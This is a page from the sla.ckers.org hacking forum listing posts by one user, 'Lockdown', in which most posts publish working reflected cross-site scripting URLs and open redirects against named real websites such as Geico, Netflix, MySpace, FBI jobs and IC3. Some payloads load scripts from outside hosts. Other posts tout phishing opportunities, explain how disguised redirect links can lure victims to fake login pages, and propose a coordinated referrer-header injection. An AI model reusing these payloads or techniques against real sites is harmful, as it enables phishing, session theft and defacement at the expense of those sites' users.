sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Current Page: 1 of 2
Results 1 - 30 of 40
7 years ago
Lockdown
that europe nokia one could be improved on. It's nasty just for downloading trojans and stuff, which would be very bad, but also, to make it just more instajavascripty http://europe.nokia.com/A4164022?url=javascript:alert(%22XSS%22); or, just onload http://europe.nokia.com/A4164022?url='%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cspan Whateva floats yo boat ;-)
Forum: Full Disclosure
7 years ago
Lockdown
kirke Wrote: ------------------------------------------------------- > http://www.justiz.gv.at/service/content.php?v_sear > ch=xss%22%3E%3Cscript%20src=http://files.die-welt. > net/s.js%3E%3C/script%3E > > original POST converted to GET, and another > example for some stupid php "sanitations" (useless > as we all know:) Eh, it's just stupid coders using
Forum: Full Disclosure
7 years ago
Lockdown
ROFL @ Above We know we're insecure, but we can't have hackers not adhering to w3c standards!
Forum: Full Disclosure
7 years ago
Lockdown
This exploit affects the billing systems of countless web hosting companies. WHMCS (Hosting CMS) Flaw found by Lockdown http://demo.whmcs.com/dologin.php?goto=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%61%77%72%63%6F%72%65%2E%6E%65%74%2F%69%6E%64%65%78 hai mom ----
Forum: Full Disclosure
7 years ago
Lockdown
http://www.billoreilly.com/search/searchresultsframe.jsp?searchstring=%22%3E%3CScript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&x=0&y=0&sortby=0&sortdir=1&searchcategory=0
Forum: Full Disclosure
7 years ago
Lockdown
<3 Geico commercials. Cigarettes http://www.smokerswelcome.com/CAM/dtclogin.jsp?brand=lolhai%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E http://www.philipmorrisusa.com/en/search/search.asp?criteria=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&code=noResultsFound
Forum: Full Disclosure
7 years ago
Lockdown
You fat: http://www.rawrcore.net/?page_id=3 .GOV EXPLOITS! H0mGAZ!11 http://www.rawrcore.net/?p=9 and I guess I'll throw this one out there because I published like a year ago and no one seemed to care: https://secure.geico.com/hr/jobapp.do?PERSONAL_DATA_firstName=lawl%22%3E%3Cbody%20onload=%22alert('lol');document.write('An%20XSS%20so%20easy,%20even%20a%20caveman%20can%20do%20it.
Forum: Full Disclosure
7 years ago
Lockdown
Damn, I feel so young.
Forum: OMG Ponies
7 years ago
Lockdown
@ Previous post: Basically, they can be used as links that seem legitimate to someone clicking them (encode the URL in hex), and when they click it they are redirected. Because the link they originally clicked looked valid, there's no reason for them to double check, and thus a page that looks like a legitimate login page or something on that site would seem authentic, but could actually be us
Forum: Full Disclosure
7 years ago
Lockdown
How old are you? << 15.
Forum: OMG Ponies
7 years ago
Lockdown
Yeah, I'm a bit late too. Damn man, we could totally start our own XSS Security Company. We could totally destroy the reputation of all other companies too (due to their suckage) A whole lot more "HackerSafe" XSS Vulns: http://www.acehardware.com/search/noResults.jsp?kw=rofl%3Cscript%3Ealert('xss');%3C/script%3E https://www.hrsaccount.com/hrs/ecare;jsessionid=?cmd_DisplayContactUsN
Forum: Full Disclosure
7 years ago
Lockdown
http://www.airtightnetworks.net/site_search.asp?mode=allwords&search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&submit0=Go
Forum: Full Disclosure
7 years ago
Lockdown
@tx: http://www10.edacafe.com/IP/result_vcx.php?keywords=lol'%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
Forum: Full Disclosure
7 years ago
Lockdown
http://www.vh1.com/search/search.jhtml?searchterm=%22;%20alert(%22XSS%22);%20%3C/script%3E
Forum: Full Disclosure
7 years ago
Lockdown
http://www.australia.gov.au/click.php?http://www.rawrcore.net
Forum: Full Disclosure
7 years ago
Lockdown
Damn, I auto-loaded way down to the bottom at the beginning, and I thought someone found an xss exploit in these forums. Damn.
Forum: Full Disclosure
7 years ago
Lockdown
http://www.gay.com/search/splash.html?keywords=%3Cscript%3Ealert%28%22You+gay+ya%3F%22%29%3B%3C%2Fscript%3E&submitSearch=search&type=content&sort=date
Forum: Full Disclosure
7 years ago
Lockdown
http://jobs.netflix.com/applyFlix.asp?act=dologin&cocode=flix&email=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E Netflix =0
Forum: Full Disclosure
7 years ago
Lockdown
Maddox = | http://maddox.xmission.com/outgoing.cgi?u=http%3A%2F%2Fmaddox%2Exmission%2Enet%2F | Also, I think that if we work together on this board, and make a link that sends fake referrer headers, we can make an exploit on http://maddox.xmission.com/statistics/statistics.html << this page. We need at least 100 hits on a page that fakes the referrer headers as saying "><script
Forum: Full Disclosure
7 years ago
Lockdown
Newlines // other formatting characters don't work =|
Forum: XSS Info
7 years ago
Lockdown
Irony, thy name is XSS http://www.ic3.gov/search.aspx?q=%3Cscript%3Ealert(%22Oh%20the%20cruel%20irony%22);%3C/script%3E www.rawrcore.net plz <3
Forum: Full Disclosure
7 years ago
Lockdown
malorn Wrote: ------------------------------------------------------- > http://www.statcounter.com/help/knowledge_base/sea > rch_knowledge_base.php?seachtext=">alert('xss') http://www.statcounter.com/help/knowledge_base/search_knowledge_base.php?seachtext=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E As for the fact that Easy discovered that, I see his 1 exploit and I raise h
Forum: Full Disclosure
7 years ago
Lockdown
https://fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert('xss');%3C/script%3E Seriously. No filtering. Whatsoever. At all.
Forum: Full Disclosure
7 years ago
Lockdown
It's not _GET, it's POST.
Forum: XSS Info
7 years ago
Lockdown
Thanks to Malorn for the starting place http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl+%27&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&special=&sb=&startIndex=0 We win. Again. http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl&location=%22+onmouseover%3D%22alert%28%27Lockdown%20LOL%27%29%3Bvar+scElem+%
Forum: Full Disclosure
7 years ago
Lockdown
Got one: http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl+%27&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&special=&sb=&startIndex=0 Myspace Exploit ^7 by Lockdown
Forum: Full Disclosure
7 years ago
Lockdown
This filter changes whitespace into a + and I can't use <script>... how can I deal with this?
Forum: XSS Info
7 years ago
Lockdown
The src ?</script> kinda screws stuff up doesn't it? Or maybe the exploit got patched already
Forum: Full Disclosure
7 years ago
Lockdown
Again? Dude, myspace needs you on their payroll. But then again, so does every other site. Hell... the internet needs you on its payroll.
Forum: Full Disclosure
7 years ago
Lockdown
Eh Oh El http://prints.deviantart.com/?catpath=photography&order=9&q=%22%3E%3Cscript+src%3D//ha.ckers.org/s.js?%3E%3C%2Fscript%3E+ In the store too.. hella phishing opportunities and shnap.
Forum: Full Disclosure